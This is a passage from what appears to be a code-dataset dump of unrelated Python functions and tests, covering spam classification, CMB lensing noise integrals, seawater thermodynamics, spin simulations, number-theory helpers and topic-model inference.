= math.log(1-value, 10)\n #print(x)\n spam_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n for word,value in HP.items(): \n if word in email_words:\n x = math.log(value, 10)\n #print(x)\n ham_ba += x \n else:\n x = math.log(1-value, 10)\n #print(x)\n ham_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n print(\"Spam Prob: \" ,spam_ba, \"Ham Prob: \" ,ham_ba)\n\n #This part determines if the emails are ham or spam depending on the calculations\n if HO == 1 and label == \"ham\":\n TN +=1\n if HO == 1 and label == \"spam\":\n FP +=1\n if SO == 1 and label == \"spam\":\n TP +=1\n if SO == 1 and label == \"ham\":\n FN +=1\n #print(classification)\n print(TP, TN, FP, FN)\n print(spam_ba)\n print(ham_ba)\n \"\"\"COMPUTES PRECISION AND RECALL\"\"\"\n Precision = TP/(TP+FP)\n Recall = TP/(TP+FN)\n\n print(\"Precision: \", Precision, \" \", \"Recall: \", Recall)", "def getEG(n,int_method,func) :\n m = np.asarray([0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,2,2.5,3,3.5,4,\n 4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10])\n bes = np.asarray([0.5,0.47768,0.44879,0.39831,0.25858,0,0.15502,0.25699,\n 0.30896,0.35245,0.39119,0.51822,0.53678,0.54984,0.55847,\n 0.56395,0.57054,0.57950,0.58402,0.58765,0.59512,0.60214,\n 0.60469,0.61143,0.61789,0.62443,0.63097,0.63694])\n p = np.asarray([1,0.85417,0.94685,1.04467,2.55052,0,1.59086,\n 1.00670,0.88866,0.83763,0.81030,0.76108,0.83093,0.86863,\n 0.89233,0.90909,0.92097,0.93007,0.93735,0.94332,0.94813,\n 0.95193,0.95557,0.95864,0.96107,0.96360,0.96570,\n 0.96788])\n h0 = np.asarray([0,-0.03567,-0.04808,-0.04315,-0.01879,0,0.00041,0.00069,\n 0.00639,0.01405,0.02294,0.07814,0.13994,0.19278,0.23793,\n 0.27678,0.31039,0.33974,0.36585,0.38917,0.41003,0.42891,\n 0.44621,0.46195,0.47644,0.48982,0.50223,0.51379])\n h1 = np.asarray([0,0.26899, 0.10571,0.01763,-0.39382,0,0.15211,0.05665,\n 0.00933,-0.02791,-0.05876,-0.16720,-0.13033,-0.10455 ,\n -0.08618,-0.07208,-0.06179,-0.05369,-0.04715,-0.04176,\n -0.03742,-0.03408,-0.03081,-0.02808,-0.02599,-0.02375,\n -0.02194,-0.02004])\n h2 = np.asarray([0,-0.09016,-0.06893,-0.04971,-0.08828,0,-0.03341,\n -0.03964,-0.04456,-0.04775,-0.04984,-0.05381,-0.03570,\n -0.02476,-0.01789,-0.01333,-0.01028,-0.00812,-0.00653,\n -0.00534,-0.00444,-0.00376,-0.00319,-0.00274,-0.00238,\n -0.00207,-0.00182,-0.00160])\n h3 = np.asarray([0,0.03993,0.03363,0.02216,-0.00797,0,0.00899,0.01172,\n 0.01150,0.01026,0.00860,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h0 = splev(n,splrep(m, h0))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h0 = griddata(m, h0, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h0,int_h1,int_h2,int_h3])", "def test_act_iv(self):\n # setup\n self.transaction_behaviour.processing = None\n self.transaction_behaviour.waiting = []\n\n # operation\n self.transaction_behaviour.act()\n\n # after\n self.assert_quantity_in_outbox(0)", "def Char_Gate(NV,res ,B_field=400):\n\n\n #data = np.loadtxt(\"NV_Sim_8.dat\") #Placeholder data to test the script\n #NV = np.vstack((data[:,3],data[:,4]))\n #physical constants\n gamma_c = 1.071e3 #g-factor for C13 in Hz/G\n #Model parameters\n omega_larmor = 2*np.pi*gamma_c*B_field\n tau_larmor = 2*np.pi/omega_larmor\n tau = res[0]\n n_pulses = int(res[1]*2) #So that we do a pi -pulse\n\n Ix = 0.5 * np.array([[0,1],[1,0]])\n Iz = 0.5* np.array([[1,0],[0,-1]])\n H0 = (omega_larmor)*Iz\n exH0 =linalg.expm(-1j*H0*tau)\n\n\n M = np.zeros(np.shape(NV)[0])\n for idC in range(np.shape(NV)[0]):\n A= 2*np.pi*NV[idC,0]\n B= 2*np.pi*NV[idC,1] #Converts to radial frequency in Hz/G\n H1 = (A+omega_larmor) *Iz +B*Ix\n exH1 = linalg.expm(-1j*H1*tau)\n V0 = exH0.dot(exH1.dot(exH1.dot(exH0)))\n V1 = exH1.dot(exH0.dot(exH0.dot(exH1)))\n n0 = Calc_axis(V0)\n n1 =Calc_axis(V1)\n phi = np.real(2*np.arccos(np.trace(V0)/2))\n M[idC] = 1 - (1-np.dot(n0,n1))*np.sin(n_pulses * phi /2 )**2\n\n Signal = -M.prod()\n F = (1-(Signal+1)/2)\n return F", "def N_TT_TE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_TE(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTE(l2)\n result += self.F_TE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n\n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def ev2vi_nrl(eV,mu):\n return 9.79e3/np.sqrt(mu)*np.sqrt(2.*eV)", "def test_create_tpm(self):\n command_line = self._MENU + [self._POOLNAME] + self._DEVICES + [\"--clevis=tpm2\"]\n TEST_RUNNER(command_line)", "def eulerphi(n):\r\n\treturn euler_phi(n)", "def enthalpy_SSO_0_p(p):\r\n v01 = 9.998420897506056e+2\r\n v05 = -6.698001071123802\r\n v08 = -3.988822378968490e-2\r\n v12 = -2.233269627352527e-2\r\n v15 = -1.806789763745328e-4\r\n v17 = -3.087032500374211e-7\r\n v20 = 1.550932729220080e-10\r\n v21 = 1.0\r\n v26 = -7.521448093615448e-3\r\n v31 = -3.303308871386421e-5\r\n v36 = 5.419326551148740e-6\r\n v37 = -2.742185394906099e-5\r\n v41 = -1.105097577149576e-7\r\n v43 = -1.119011592875110e-10\r\n v47 = -1.200507748551599e-15\r\n SSO = 35.16504\r\n a0 = v21 + SSO * (v26 + v36 * SSO + v31 * np.sqrt(SSO))\r\n a1 = v37 + v41 * SSO\r\n a2 = v43\r\n a3 = v47\r\n b0 = v01 + SSO * (v05 + v08 * np.sqrt(SSO))\r\n b1 = 0.5 * (v12 + v15 * SSO)\r\n b2 = v17 + v20 * SSO\r\n b1sq = b1 ** 2\r\n sqrt_disc = np.sqrt(b1sq - b0 * b2)\r\n N = a0 + (2 * a3 * b0 * b1 / b2 - a2 * b0) / b2\r\n M = a1 + (4 * a3 * b1sq / b2 - a3 * b0 - 2 * a2 * b1) / b2\r\n A = b1 - sqrt_disc\r\n B = b1 + sqrt_disc\r\n part = (N * b2 - M * b1) / (b2 * (B - A))\r\n db2Pascal = 10000.0\r\n return (db2Pascal * (p * (a2 - 2 * a3 * b1 / b2 + 0.5 * a3 * p) / b2 +\r\n (M / (2 * b2)) * np.log(1 + p * (2 * b1 + b2 * p) / b0) + part *\r\n np.log(1 + (b2 * p * (B - A)) / (A * (B + b2 * p)))))", "def __init__(self):\n self.modulo = Bn.from_decimal(\n \"104274339861599109435228713715012587636997755949475388588516377743858594829526246207815488124753620113654378182611410869843692693515483841382145633329409600605358434237971173658402530546783352648106247803514459454270482848535758539851532076708790494943517894654046363923325714750480680188239471613308156143136830981518627799499285672172738874571644891075726999700275877298890101149587792836886648258733566308895110719770960720300899066897289080371563621668124216187770149740826973622700315037066876583866156345639276386510201006397141393775575135928749962477326783336184434815042335057049432193006499521591281357491659\")\n self.generator = FFElement(Bn.from_decimal(\n \"81099144573950922883933823309397903831307729923277144841334749422315595743437219371821139976270089085817737914449263008752457618988770955139245864971428025146021819160336876692205993068777078938240475549226164124952577975303221660397947822711916352061614341728562734417872584743294922245761212731150483802964283263230741041446988298186702952974697967148198190463075071628059974486966250538161512056563568090071474143434146441589514816635339916481756264419884177841781745530245175458079612447970067897693825433138760936325168807521204548329680909932742314536162869895548442852131478295912996232046258690790851591666552\"),\n self.modulo, self.order())", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def test_put_nveto_pmt_item(self):\n pass", "def intf_MIDN(E):\n inputok= False\n if E.The.StackSize() >= 3: # Ensure something is here.\n checkob= E.The.StackCopyItemLast() \n if checkob.whatami == \"VAL\":\n inputok= True\n if not inputok or not inc.point_formatted_LST(E.The,2) or not inc.point_formatted_LST(E.The,3):\n print(\"Input Error: midn\")\n print(intf_MIDN.__doc__)\n return # Without doing much of anything.\n ratio= E.The.StackPop().val\n P1object= E.The.StackPop()\n #P1= map(lambda x:x.val, P1object.val) # Should now be a list of floats.\n P1= [x.val for x in P1object.val] # Should now be a list of floats.\n P0object= E.The.StackPop()\n #P0= map(lambda x:x.val, P0object.val) # Should now be a list of floats.\n P0= [x.val for x in P0object.val] # Should now be a list of floats.\n x= (P1[0]-P0[0]) * ratio + P0[0]\n y= (P1[1]-P0[1]) * ratio + P0[1]\n z= (P1[2]-P0[2]) * ratio + P0[2]\n z= objectifier.StackOB_VAL(z) # Can't be just regular Python ints.\n y= objectifier.StackOB_VAL(y)\n x= objectifier.StackOB_VAL(x)\n p= objectifier.StackOB_LST([x, y, z])\n p.names= ['x','y','z']\n E.The.StackPush(p)", "def N_TT_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TB.__func__, \"integ\"):\n self.N_TT_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_T2():\n infile = \"cisd/T2.in\"\n assert(os.path.exists(infile))\n with open(infile) as f:\n lines = f.readlines()\n assert(len(lines) == 10)\n\n hl1 = HirataLine(lines[0])\n assert(set(hl1.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl1.summation_indices == '')\n assert(hl1.prefactors == [\"+ 1.0 \"])\n assert(hl1.postfactors == ['v ( p3 p4 h1 h2 )'])\n assert(str(hl1) == lines[0].replace('\\n', ''))\n cl1 = Cc4sLine(hl1)\n assert(set(cl1.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl1.summation_indices == \"\")\n assert(cl1.prefactors == [\"+ 1.0 \"])\n assert(cl1.postfactors == ['Vabij[\"cdij\"]'])\n assert(cl1.to_cpp() == ['( + 1.0 ) * Vabij[\"cdij\"];'])\n\n hl8 = HirataLine(lines[7])\n assert(set(hl8.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl8.summation_indices == ' h6 p5 ')\n assert(\n hl8.prefactors == [\n '+ 1.0 ',\n '- 1.0 * P( p3 p4 h2 h1 => p4 p3 h2 h1 ) ',\n '- 1.0 * P( p3 p4 h2 h1 => p3 p4 h1 h2 ) ',\n '+ 1.0 * P( p3 p4 h2 h1 => p4 p3 h1 h2 ) '\n ]\n )\n assert(\n hl8.postfactors ==\n ['Sum ( h6 p5 )', 't ( p5 p3 h6 h2 )', 'v ( h6 p4 h1 p5 )']\n )\n assert(str(hl8) == lines[7].replace('\\n', ''))\n cl8 = Cc4sLine(hl8)\n assert(set(cl8.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl8.summation_indices == \" n e \")\n assert(\n cl8.prefactors ==\n ['+ 1.0 ',\n '- 1.0 * P( c d j i => d c j i ) ',\n '- 1.0 * P( c d j i => c d i j ) ',\n '+ 1.0 * P( c d j i => d c i j ) ']\n )\n assert(cl8.postfactors == ['Tabij[\"ecnj\"]', 'Viajb[\"ndie\"]'])\n assert(\n cl8.to_cpp() == [\n '( + 1.0 ) * Tabij[\"ecnj\"] * Viajb[\"ndie\"];',\n '( - 1.0 ) * Tabij[\"ednj\"] * Viajb[\"ncie\"];',\n '( - 1.0 ) * Tabij[\"ecni\"] * Viajb[\"ndje\"];',\n '( + 1.0 ) * Tabij[\"edni\"] * Viajb[\"ncje\"];'\n ]\n )", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def condition_tpm(self,tpm, fixed_nodes, state):\n conditioning_indices = [[slice(None)]] * len(state)\n for i in fixed_nodes:\n # Preserve singleton dimensions with `np.newaxis`\n conditioning_indices[i] = [state[i], np.newaxis]\n # Flatten the indices.\n conditioning_indices = list(chain.from_iterable(conditioning_indices))\n # Obtain the actual conditioned TPM by indexing with the conditioning\n # indices.\n return tpm[tuple(conditioning_indices)]", "def prove_I0() -> Proof:\n # Task 4.8", "def prove_NNE() -> Proof:\n # Optional Task 6.7b", "def eulerphi(n):\n\treturn euler_phi(n)", "def _inv_totient_estimate(m):\n primes = [ d + 1 for d in divisors(m) if isprime(d + 1) ]\n\n a, b = 1, 1\n\n for p in primes:\n a *= p\n b *= p - 1\n\n L = m\n U = int(math.ceil(m*(float(a)/b)))\n\n P = p = 2\n primes = []\n\n while P <= U:\n p = nextprime(p)\n primes.append(p)\n P *= p\n\n P //= p\n b = 1\n\n for p in primes[:-1]:\n b *= p - 1\n\n U = int(math.ceil(m*(float(P)/b)))\n\n return L, U", "def Create(self, tokens):\n self.delay1 = int(tokens[DELAY1])\n self.delay2 = int(tokens[DELAY2])\n self.block = int(tokens[BLOCK])\n self.trial = int(tokens[TRIAL])\n self.practiced = tokens[PRACTICED]\n self.fixationOnset = int(tokens[FIXATION_ONSET])\n self.encodingOnset = int(tokens[ENCODING_ONSET])\n self.encodingRt = int(tokens[ENCODING_RT])\n self.executionOnset = int(tokens[EXECUTION_ONSET])\n self.executionRt = int(tokens[EXECUTION_RT])\n self.probeOnset = int(tokens[PROBE_ONSET])\n self.probeRt = int(tokens[PROBE_RT])\n self.probeAcc = int(tokens[PROBE_ACC])\n self.acc = int(tokens[PROBE_ACC])\n self.blockBegin = 0\n self.blockOffset = 0\n\n # In case of RTs that are 0s, one needs to apply\n # a correction. In particular, one needs to estimate\n # the correct duration of each phase.\n if self.encodingRt == 0:\n d = self.executionOnset - self.encodingOnset - self.delay1 - 2000\n #print \"Trial %d, EncodingRT=0, estimated as %d\" % (self.trial, d) \n self.encodingRt = d\n\n if self.executionRt == 0:\n d = self.probeOnset - self.executionOnset - self.delay2 - 1000\n #print \"Trial %d, ExecutionRT=0, estimated as %d, probe=%d, exec=%d, delay2=%d\" % (self.trial, d, self.probeOnset, self.executionOnset, self.delay2) \n self.executionRt = d\n\n # If, after the correction, we have negative RTs, that means\n # that we are dealing with aborted trials (in the newer version \n # of the Eprime script). They need to be removed.\n \n if self.executionRt <= 0 or self.encodingRt <= 0:\n print \"*** Excluding trial %d --- out of time ***\" % self.trial\n # The current probe RT belongs to the previous trial, so it must\n # be overwritten.\n self.executionRt = -1 # Override (in case only Encoding was detected)\n self.probeRt = -1 # Override\n self.probeAcc = 0\n self.acc = 0\n\n self.onsets = {'Encoding' : self.encodingOnset,\n 'Execution' : self.executionOnset,\n 'Probe' : self.probeOnset}\n\n self.rts = {'Encoding' : self.encodingRt,\n 'Execution' : self.executionRt,\n 'Probe' : self.probeRt}", "def evaltr(x_solution): \n \n large = 10.0**30\n pred = np.zeros(cfg.ntrain)\n e0 = 0.0 # mean of observed values\n y=0.0\n for i in range(cfg.ntrain): # Computation of correct piece\n e0 += cfg.a_unscaled[i][-1]\n pind = 0\n ipbest = 0\n pbest = -large # for max\n \n for j1 in range(cfg.nomax):\n ipmin=pind\n pmin=large # for min\n for _ in range(cfg.jk[j1]):\n piece=x_solution[(pind+1)*cfg.nfea-1] \n for j3 in range(cfg.nfea-1): #\n piece += x_solution[pind*cfg.nfea+j3]*cfg.a_unscaled[i][j3]\n if piece < pmin:\n ipmin = pind\n pmin = piece\n pind += 1 \n \n if pmin > pbest:\n ipbest = ipmin\n pbest = pmin\n \n pred[i] = x_solution[(ipbest+1)*cfg.nfea-1] # Computation of prediction\n for j1 in range(cfg.nfea-1):\n pred[i] += x_solution[ipbest*cfg.nfea+j1]*cfg.a_unscaled[i][j1]\n y += pred[i]\n \n y = y/cfg.ntrain \n e0 = e0/cfg.ntrain\n \n # Computation of indices\n rmse = 0.0\n mae = 0.0\n e1 = 0.0\n for i in range(cfg.ntrain):\n rmse += (pred[i]-cfg.a_unscaled[i][-1])**2\n mae += np.abs(pred[i]-cfg.a_unscaled[i][-1]) \n e1 += (cfg.a_unscaled[i][-1] - e0)**2\n ce = 1.0 - rmse/e1 \n rmse = np.sqrt(rmse/cfg.ntrain)\n mae = mae/cfg.ntrain \n\n if cfg.ntrain > 1:\n sx=0.0\n sy=0.0\n rcor=0.0\n for i in range(cfg.ntrain):\n sx += (pred[i]-y)**2\n sy += (cfg.a_unscaled[i][-1]-e0)**2 \n rcor += (pred[i]-y) * (cfg.a_unscaled[i][-1]-e0) \n\n r = rcor/np.sqrt(sx*sy)\n \n return rmse,mae,ce,r", "def TCVB0(docs, alpha, beta, epsilon=0.0001, log=no_log):\n D, V = docs.shape\n K = len(alpha)\n\n #store variational q_{z_{d,w} = t} for each d as sparse table in\n #array z\n z = np.zeros(D, dtype=object)\n\n #initialize counts\n #N[t, w] = expectaction of unnormalized phi_{k,w}\n N = np.zeros((V, K), dtype=float)\n\n #Nd[d, t] = unnormalized theta_{d,k}\n Nd = np.zeros((D, K), dtype=float)\n\n for d in xrange(D):\n #random initialization\n init = rand(docs[d].nnz * K)\n active_words = docs[d].nonzero()[1]\n ij = (np.repeat(active_words, K), np.tile(np.arange(K), len(active_words)))\n\n #z[d] is VxK sparse row matrix\n z[d] = csr_matrix((init, ij), shape=(V, K))\n\n #normalize z[d]\n z[d] = normalize(z[d], norm='l1', axis=1)\n\n #update counts\n #set_trace()\n M = diag(docs[d]).dot(z[d]).toarray()\n N += M\n Nd[d] = M.sum(axis=0) + alpha\n\n log('document %d/%d preinitialized' % (d + 1, D))\n\n #sum of array and matrix is matrix, so convertion is required\n N = np.asarray(N) + beta\n\n #Nt[t] is pre-computed unnormalized expectation topic t\n Nt = np.squeeze(np.asarray(N.sum(axis=0)))\n if type(beta) is float:\n Nt += V * beta\n elif type(beta) is np.ndarray:\n Nt += beta.sum(axis=0)\n else:\n raise 'beta must be either scalar (float) number for symmetric prior or a full matrix VxK for custom prior'\n\n #do variational updates until convergence\n iteration = 1\n while True:\n iteration_time = time()\n avg_diff = 0.0\n\n #for each document\n for d in xrange(D):\n #for each word in a document\n max_diff = 0.0\n doc_diff = 0.0\n\n doc_w = docs.data[docs.indptr[d]:docs.indptr[d + 1]]\n\n i = 0\n old_z_d = z[d].data.copy()\n #for each word in the document d\n #do variational update and estimate difference\n for w in docs.indices[docs.indptr[d]:docs.indptr[d + 1]]:\n #save old q(z_d) distribution\n old_z = z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] * doc_w[i]\n #we take expectations ignoring current document and current word\n N[w] -= old_z\n Nt[:] -= old_z\n Nd[d] -= old_z\n #update\n new_z = N[w] / Nt * Nd[d]\n #normalization\n new_z /= new_z.sum()\n #write new values back\n z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] = new_z\n #expectations update\n new_z *= doc_w[i]\n N[w] += new_z\n Nt[:] += new_z\n Nd[d] += new_z \n\n i += 1\n\n #word_diff = variational_update(d, w)\n doc_diff += np.abs(old_z_d - z[d].data)\n avg_diff += doc_diff.sum()\n max_diff = max(max_diff, doc_diff.max())\n if d % 100 == 0:\n log('document %d/%d was updated' % (d + 1, D))\n\n avg_diff /= docs.nnz * K\n log('iteration %d. avg diff: %f. max diff: %f. time: %f' % (iteration, avg_diff, max_diff, time() - iteration_time))\n\n if max_diff < epsilon:\n break\n\n iteration += 1\n\n return z", "def gen_new_phiw_div_phib_arr(N_PROCESSES, phiw_div_phib_arr_new, cond_GT, fcn_D, fcn_eta, z_div_L_arr, phiw_div_phib_arr, Pi_div_DLP_arr, weight, gp_arr, gm_arr, yt_arr, phi_yt_arr, ID_yt_arr, Ieta_yt_arr):\n phi_b = cond_GT['phi_bulk']\n ed = cond_GT['epsilon_d']\n membrane_geometry = cond_GT['membrane_geometry']\n \n Ny = size(yt_arr)\n # # Python allocate the name for phi_yt_arr[0], this is the same as reference value for C++ \" y= &x\"\n phi_arr_z0 = phi_yt_arr[0]\n Ieta_arr_z0= Ieta_yt_arr[0]\n ID_arr_z0 = ID_yt_arr[0]\n\n ind_z0 = 0 #z-index at inlet\n \n z0_div_L = 0. #z-coord at inlet\n \n r0_div_R = 0. #r-coord at the centerline of pipe\n rw_div_R = 1. #r-coord at the membrane wall\n \n vw_div_vw0_z0 = get_v_conv(rw_div_R, z0_div_L, Pi_div_DLP_arr[ind_z0], cond_GT, gp_arr[ind_z0], gm_arr[ind_z0])\n gen_phi_wrt_yt(z0_div_L, phiw_div_phib_arr[ind_z0]*phi_b, fcn_D, vw_div_vw0_z0, yt_arr, phi_arr_z0, cond_GT)\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, Ieta_arr_z0, fcn_eta, cond_GT)\n Ieta_arr_z0 /= Ieta_arr_z0[-1] # CHECK\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, ID_arr_z0, fcn_D, cond_GT)\n\n uZ_z0 = get_uZ_out(z0_div_L, cond_GT['k'], cond_GT['Bp'], cond_GT['Bm'], gp_arr[ind_z0], gm_arr[ind_z0])\n F2_0 = cal_F2_Z(vw_div_vw0_z0, ed, yt_arr, Ieta_arr_z0, ID_arr_z0, uZ_z0, membrane_geometry)\n\n Nz = size(z_div_L_arr)\n if (N_PROCESSES ==1):\n # when only single-processor is allocated\n for i in range(1, Nz):\n phiw_div_phib_arr_new[i] = process_at_zi(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\n else:\n # this uses multiprocessing packages\n import multiprocessing as mp\n \n pool = mp.Pool(N_PROCESSES)\n args_list = [(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\\\n for i in range(1, Nz)]\n phiw_div_phib_arr_new[1:] = pool.starmap(process_at_zi, args_list)\n pool.close()\n pool.join()\n\n cnt_EXCEED = 0 \n for i,x in enumerate(phiw_div_phib_arr_new):\n\n x = x*cond_GT['phi_bulk']\n if x > cond_GT['phi_freeze']:\n cnt_EXCEED += 1\n phiw_div_phib_arr_new[i] = cond_GT['phi_freeze']/cond_GT['phi_bulk'] # this prevent the accidently beyond the freezing concentration\n if(cnt_EXCEED>0):\n print('Warning: exceed phi_freeze %d times out of %d\\n'%(cnt_EXCEED, cond_GT['Nz']))\n\n FPI_operator(cond_GT['weight'], phiw_div_phib_arr, phiw_div_phib_arr_new, N_skip=1) # phiw(0) must be phib.\n\n return 0", "def _r_inv(self):\n raise NotImplementedError", "def N_TE_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or 